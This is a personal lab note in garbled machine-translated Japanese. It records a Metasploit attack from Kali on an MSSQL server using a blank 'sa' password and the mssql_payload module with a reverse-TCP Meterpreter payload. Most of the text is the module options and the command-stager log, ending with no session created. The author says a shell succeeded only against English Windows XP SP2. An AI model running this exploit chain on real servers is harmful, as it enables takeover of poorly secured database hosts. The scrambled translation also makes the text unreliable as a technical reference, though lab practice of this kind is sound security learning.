Metasploitのはカーリーの実験は、以下の手順を行って:
msf5は(ウィンドウ/ MSSQL / mssql_payload)>ショーオプションエクスプロイト (エクスプロイト/窓/ MSSQL / mssql_payload)モジュールオプション: 名前現在は必須説明を設定します ---- --------------- - ------ ----------- 方法は、使用するペイロード送達方法(PS、CMD、または古い)はいcmdを パスワードSAユーザ名が指定されたためにパスワードなし 192.168.0.20はいターゲットをのrhostsをホスト(複数可)、レンジCIDR識別子、または構文でhostsファイル「ファイル:<パス>」 RPORT 1433はいターゲットポート(TCP) SRVHOST 0.0.0.0はいリッスンするローカルホスト。これは、ローカルマシン上のアドレスまたは0.0.0.0でなければなりません SRVPORT 8080はいリッスンするローカルポート。 SSLの偽には着信接続にSSLをネゴシエートしない (デフォルトはランダムに生成された)カスタムSSL証明書に何のパスのsslcertない TDSENCRYPTIONの偽はい使用TLS / TDSデータのためのSSL「暗号化の強制」 (デフォルトはランダムです)、このために使用していないURIPATH URIエクスプロイト 何USERNAME saはありませ認証するためにユーザ名として USE_WINDOWS_AUTHENT偽はい使用ウィンドウの真偽は(DOMAINオプションのセットが必要) :(ウィンドウ/ meterpreter / reverse_tcp)ペイロードオプションを 名前現在は必須説明を設定します ---- --------------- ---- ---- ----------- EXITFUNCプロセスはい出口技術(承認:「」、SEH、スレッド、プロセス、なし) LHOST 192.168.0.22はいリスンアドレス(インタフェースが指定されてもよい) 活用msf5(ウィンドウ/ MSSQL / mssql_payload)>活用 192.168.0.22:4444の[*]開始リバースTCPハンドラ ポートが聞くlportは4444はい :ターゲットエクスプロイト ID名前 ---- - 0自動 [*] 192.168.0.20:1433を-サーバーはxp_cmdshellを...それを可能にしようと、無効になっている可能性が 192.168.0.20:1433 [*] -コマンドステージャー進捗- 1.47パーセントを行う(102246分の1499バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 2.93パーセントを行う(102246分の2998バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 4.40 %(4497/102246バイト)行わ [*] 192.168.0.20:1433 -コマンドStagerの進捗- 5.86パーセントは、(102246分の5996バイト)を行う [*] 192.168.0.20:1433 -コマンドステージャー進捗- 7.33パーセント行う(102246分の7495バイト) [*] 192.168.0.20:1433 -コマンドStagerの進捗- 8.80パーセント行う(102246分の8994バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 10.26パーセントを行う(102246分の10493バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 11.73パーセントを行う(102246分の11992バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 13.19パーセントを行う(102246分の13491バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 14.66パーセントを行う(102246分の14990バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ16.13パーセント(102246分の16489バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 17.59パーセントを行う(102246分の17988バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 19.06パーセントを行う(19487 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 20.53パーセントを行う(102246分の20986バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 21.99パーセントを行う(102246分の22485バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 23.46パーセントを行う(102246分の23984バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 24.92パーセントを行う(102246分の25483バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 26.39パーセントを行う(102246分の26982バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 27.86パーセントを行う(102246分の28481バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ29.32パーセント(102246分の29980バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 30.79パーセントを行う(102246分の31479バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 32.25パーセントを行う(32978 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 33.72パーセントを行う(102246分の34477バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 35.19パーセントを行う(102246分の35976バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 36.65パーセントを行う(102246分の37475バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 38.12パーセントを行う(102246分の38974バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ39.58パーセント(102246分の40473バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 41.05パーセントを行う(102246分の41972バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 42.52パーセントを行う(43471 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 43.98パーセントを行う(102246分の44970バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 45.45パーセントを行う(102246分の46469バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 46.91パーセントを行う(102246分の47968バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 48.38パーセントを行う(102246分の49467バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 49.85パーセントを行う(102246分の50966バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 51.31パーセントを行う(102246分の52465バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ52.78パーセント(102246分の53964バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 54.24パーセントを行う(102246分の55463バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 55.71パーセントを行う(56962 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 57.18パーセントを行う(102246分の58461バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 58.64パーセントを行う(102246分の59960バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 60.11パーセントを行う(102246分の61459バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 61.58パーセントを行う(102246分の62958バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ63.04パーセント(102246分の64457バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 64.51パーセントを行う(102246分の65956バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 65.97パーセントを行う(67455 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 67.44パーセントを行う(102246分の68954バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 68.91パーセントを行う(102246分の70453バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 70.37パーセントを行う(102246分の71952バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 71.84パーセントを行う(102246分の73451バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 73.30パーセントを行う(102246分の74950バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 74.77パーセントを行う(102246分の76449バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ76.24パーセント(102246分の77948バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 77.70パーセントを行う(102246分の79447バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 79.17パーセントを行う(80946 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 80.63パーセントを行う(102246分の82445バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 82.10パーセントを行う(102246分の83944バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 83.57パーセントを行う(102246分の85443バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 85.03パーセントを行う(102246分の86942バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ86.50パーセント(102246分の88441バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 87.96パーセントを行う(102246分の89940バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 89.43パーセントを行う(91439 / 102246バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 90.90パーセントを行う(102246分の92938バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 92.36パーセントを行う(102246分の94437バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 93.83パーセントを行う(102246分の95936バイト) [*] 192.168.0.20 :1433 -コマンドステージャー進捗- 95.29パーセントを行う(102246分の97435バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 96.76パーセントを行う(102246分の98934バイト) [*] 192.168.0.20:1433 -コマンドStagerの進歩-行っ98.19パーセント(102246分の100400バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 99.59パーセントを行う(102246分の101827バイト) [*] 192.168.0.20:1433 -コマンドステージャー進捗- 100.00パーセントを行う(102246 / 102246バイト) [*]完了悪用が、何のセッションが作成されませんでした。 msf5悪用する(Windows / MSSQL / mssql_payload)>
人々は最後の言葉がさ吸う
完了悪用が、セッションが作成されませんでした 。
SanBanFuは、終了シェルに返すことができない、私は多くの方法を試してみました、Metasploitのバージョンを置き換え、システムを操作する無人偵察機を交換していない仕事をイライラどんなに、最終的に本から答えを見つける、ドローンは、重要なことは、英語で「」「「英語で」の英語版を3回言ってWindows XP SP2の英語版を使用したいです。」
シェルには本当に成功したリターンを交換した後。他のシステム、特に中国語版に関しては、私が従事するのか分かりません。